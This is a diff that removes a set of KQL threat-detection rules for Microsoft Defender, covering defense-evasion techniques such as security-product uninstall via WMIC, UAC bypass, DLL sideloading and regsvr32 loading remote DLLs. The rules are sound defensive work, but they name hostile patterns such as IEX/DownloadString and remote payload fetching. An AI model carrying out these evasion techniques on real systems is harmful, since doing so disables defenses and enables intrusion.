+0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/01/30 -// Level: high -// Description: Detects uninstallation or termination of security products using the WMIC utility -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "wmic" and ProcessCommandLine contains "product where " and ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall" and ProcessCommandLine contains "/nointeractive") or ((ProcessCommandLine contains "call delete" or ProcessCommandLine contains "call terminate") and (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "caption like ")) or (ProcessCommandLine contains "process " and ProcessCommandLine contains "where " and ProcessCommandLine contains "delete")) and (ProcessCommandLine contains "%carbon%" or ProcessCommandLine contains "%cylance%" or ProcessCommandLine contains "%endpoint%" or ProcessCommandLine contains "%eset%" or ProcessCommandLine contains "%malware%" or ProcessCommandLine contains "%Sophos%" or ProcessCommandLine contains "%symantec%" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "AVG " or ProcessCommandLine contains "Carbon Black" or ProcessCommandLine contains "CarbonBlack" or ProcessCommandLine contains "Cb Defense Sensor 64-bit" or ProcessCommandLine contains "Crowdstrike Sensor" or ProcessCommandLine contains "Cylance " or ProcessCommandLine contains "Dell Threat Defense" or ProcessCommandLine contains "DLP Endpoint" or ProcessCommandLine contains "Endpoint Detection" or ProcessCommandLine contains "Endpoint Protection" or ProcessCommandLine contains "Endpoint Security" or ProcessCommandLine contains "Endpoint Sensor" or ProcessCommandLine contains "ESET File Security" or ProcessCommandLine contains "LogRhythm System Monitor Service" or ProcessCommandLine contains "Malwarebytes" or ProcessCommandLine contains "McAfee Agent" or ProcessCommandLine contains "Microsoft Security Client" or ProcessCommandLine contains "Sophos Anti-Virus" or ProcessCommandLine contains "Sophos AutoUpdate" or ProcessCommandLine contains "Sophos Credential Store" or ProcessCommandLine contains "Sophos Management Console" or ProcessCommandLine contains "Sophos Management Database" or ProcessCommandLine contains "Sophos Management Server" or ProcessCommandLine contains "Sophos Remote Management System" or ProcessCommandLine contains "Sophos Update Manager" or ProcessCommandLine contains "Threat Protection" or ProcessCommandLine contains "VirusScan" or ProcessCommandLine contains "Webroot SecureAnywhere" or ProcessCommandLine contains "Windows Defender") \ No newline at end of file diff --git a/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql b/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql deleted file mode 100644 index cb5229ea..00000000 --- a/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: medium -// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques. -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceProcessEvents -| where FolderPath endswith "sdclt.exe" and ProcessIntegrityLevel =~ "High" \ No newline at end of file diff --git a/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql b/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql deleted file mode 100644 index da809f2c..00000000 --- a/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/08/03 -// Level: medium -// Description: Detects potential DLL sideloading of "vivaldi_elf.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql b/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql deleted file mode 100644 index 4753e096..00000000 --- a/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/05/18 -// Level: medium -// Description: Detects potential DLL sideloading of "wwlib.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql b/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql deleted file mode 100644 index 77fc4544..00000000 --- a/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/14 -// Level: high -// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql deleted file mode 100644 index 224f54fb..00000000 --- a/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/03/13 -// Level: medium -// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql b/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql deleted file mode 100644 index 91f57b60..00000000 --- a/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/05/18 -// Level: high -// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence. -// Tags: attack.defense_evasion, attack.t1036.003 -DeviceRegistryEvents -| where ActionType =~ "RegistryValueSet" and RegistryKey endswith "\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger" \ No newline at end of file diff --git a/Defense Evasion/Potential_Winnti_Dropper_Activity.kql b/Defense Evasion/Potential_Winnti_Dropper_Activity.kql deleted file mode 100644 index fd24affe..00000000 --- a/Defense Evasion/Potential_Winnti_Dropper_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Alexander Rausch -// Date: 2020/06/24 -// Level: high -// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook -// Tags: attack.defense_evasion, attack.t1027 -DeviceFileEvents -| where FolderPath endswith "\\gthread-3.6.dll" or FolderPath endswith "\\sigcmm-2.4.dll" or FolderPath endswith "\\Windows\\Temp\\tmp.bat" \ No newline at end of file diff --git a/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql b/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql deleted file mode 100644 index fa40db7c..00000000 --- a/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/20 -// Level: high -// Description: Detects potential DLL sideloading of "appverifUI.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql b/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql deleted file mode 100644 index 3695de47..00000000 --- a/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/20 -// Level: medium -// Description: Detects usage of Dsacls to grant over permissive permissions -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains " /G " and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") and (ProcessCommandLine contains "GR" or ProcessCommandLine contains "GE" or ProcessCommandLine contains "GW" or ProcessCommandLine contains "GA" or ProcessCommandLine contains "WP" or ProcessCommandLine contains "WD") \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql b/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql deleted file mode 100644 index 0c07adec..00000000 --- a/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/14 -// Level: high -// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation. -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Roaming\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\") and (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\") and FolderPath endswith "\\aspnet_compiler.exe" \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql b/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql deleted file mode 100644 index cb8fcc62..00000000 --- a/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/12 -// Level: medium -// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. -This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and (((ProcessCommandLine contains ">" and ProcessCommandLine contains "%APPDATA%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TEMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%USERPROFILE%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\ProgramData\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Temp\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Users\\Public\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Windows\\Temp\\")) or ((ProcessCommandLine contains " >" or ProcessCommandLine contains "\">" or ProcessCommandLine contains "'>") and (ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql b/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql deleted file mode 100644 index ca49b897..00000000 --- a/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bhabesh Raj, X__Junior (Nextron Systems) -// Date: 2021/07/30 -// Level: medium -// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ((ProcessCommandLine contains "-F:" or ProcessCommandLine contains "/F:") and FolderPath endswith "\\expand.exe") and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains ":\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) and (not((ProcessCommandLine contains "C:\\ProgramData\\Dell\\UpdateService\\Temp\\" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql b/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql deleted file mode 100644 index 08972048..00000000 --- a/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/07/13 -// Level: high -// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "Win32_NTEventlogFile" and (ProcessCommandLine contains ".BackupEventlog(" or ProcessCommandLine contains ".ChangeSecurityPermissions(" or ProcessCommandLine contains ".ChangeSecurityPermissionsEx(" or ProcessCommandLine contains ".ClearEventLog(" or ProcessCommandLine contains ".Delete(" or ProcessCommandLine contains ".DeleteEx(" or ProcessCommandLine contains ".Rename(" or ProcessCommandLine contains ".TakeOwnerShip(" or ProcessCommandLine contains ".TakeOwnerShipEx(") \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql deleted file mode 100644 index 25ef6289..00000000 --- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/12 -// Level: medium -// Description: Detects potentially suspicious child processes of a ClickOnce deployment application -// Tags: attack.execution, attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\" \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql deleted file mode 100644 index d3abfa67..00000000 --- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/15 -// Level: medium -// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\diskshadow.exe" \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql deleted file mode 100644 index f5e4d204..00000000 --- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/05/05 -// Level: high -// Description: Detects potentially suspicious child processes of "regsvr32.exe". -// Tags: attack.defense_evasion, attack.t1218.010 -DeviceProcessEvents -| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (not((ProcessCommandLine contains " -u -p " and FolderPath endswith "\\werfault.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql deleted file mode 100644 index 4dc7fab5..00000000 --- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/26 -// Level: medium -// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\")) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql deleted file mode 100644 index a30d1353..00000000 --- a/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2024/05/13 -// Level: medium -// Description: Detects potentially suspicious child processes of KeyScrambler.exe -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002 -DeviceProcessEvents -| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe" \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql b/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql deleted file mode 100644 index a5a3cf74..00000000 --- a/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/22 -// Level: high -// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses. -// Tags: attack.defense_evasion, attack.t1218.008 -DeviceProcessEvents -| where (ProcessCommandLine contains "REGSVR " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll")) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql b/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql deleted file mode 100644 index 04a1ecbd..00000000 --- a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Stephen Lincoln @slincoln-aiq (AttackIQ) -// Date: 2023/12/21 -// Level: medium -// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. -This is a common technique used by malware to change the desktop background to a ransom note or other image. - -// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2")) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql b/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql deleted file mode 100644 index ea293a77..00000000 --- a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ) -// Date: 2023/12/21 -// Level: medium -// Description: Detects regsitry value settings that would replace the user's desktop background. -This is a common technique used by malware to change the desktop background to a ransom note or other image. - -// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001 -DeviceRegistryEvents -| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(InitiatingProcessFolderPath endswith "\\svchost.exe")) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql b/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql deleted file mode 100644 index 0897182f..00000000 --- a/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2017/03/19 -// Level: high -// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql b/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql deleted file mode 100644 index 1175f08b..00000000 --- a/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/15 -// Level: high -// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe" -// Tags: attack.defense_evasion -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" and (not((isnull(FolderPath) or (FolderPath contains "\\Google" or (FolderPath endswith "\\setup.exe" or FolderPath endswith "chrome_updater.exe" or FolderPath endswith "chrome_installer.exe"))))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql b/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql deleted file mode 100644 index 1babab4d..00000000 --- a/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/21 -// Level: high -// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code. -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\dopus.exe") and (ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Templates" or ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Word\\Startup\\" or ProcessCommandLine contains "\\Microsoft Office\\root\\Templates\\" or ProcessCommandLine contains "\\Microsoft Office\\Templates\\")) and (not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx"))) \ No newline at end of file diff --git a/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql b/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql deleted file mode 100644 index 60ec888b..00000000 --- a/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/11 -// Level: high -// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address. -// Tags: attack.defense_evasion, attack.t1218.010 -DeviceProcessEvents -| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains " /i:http://1" or ProcessCommandLine contains " /i:http://2" or ProcessCommandLine contains " /i:http://3" or ProcessCommandLine contains " /i:http://4" or ProcessCommandLine contains " /i:http://5" or ProcessCommandLine contains " /i:http://6" or ProcessCommandLine contains " /i:http://7" or ProcessCommandLine contains " /i:http://8" or ProcessCommandLine contains " /i:http://9" or ProcessCommandLine contains " /i:https://1" or ProcessCommandLine contains " /i:https://2" or ProcessCommandLine contains " /i:https://3" or ProcessCommandLine contains " /i:https://4" or ProcessCommandLine contains " /i:https://5" or ProcessCommandLine contains " /i:https://6" or ProcessCommandLine contains " /i:https://7" or ProcessCommandLine contains " /i:https://8" or ProcessCommandLine contains " /i:https://9" or ProcessCommandLine contains " -i:http://1" or ProcessCommandLine contains " -i:http://2" or 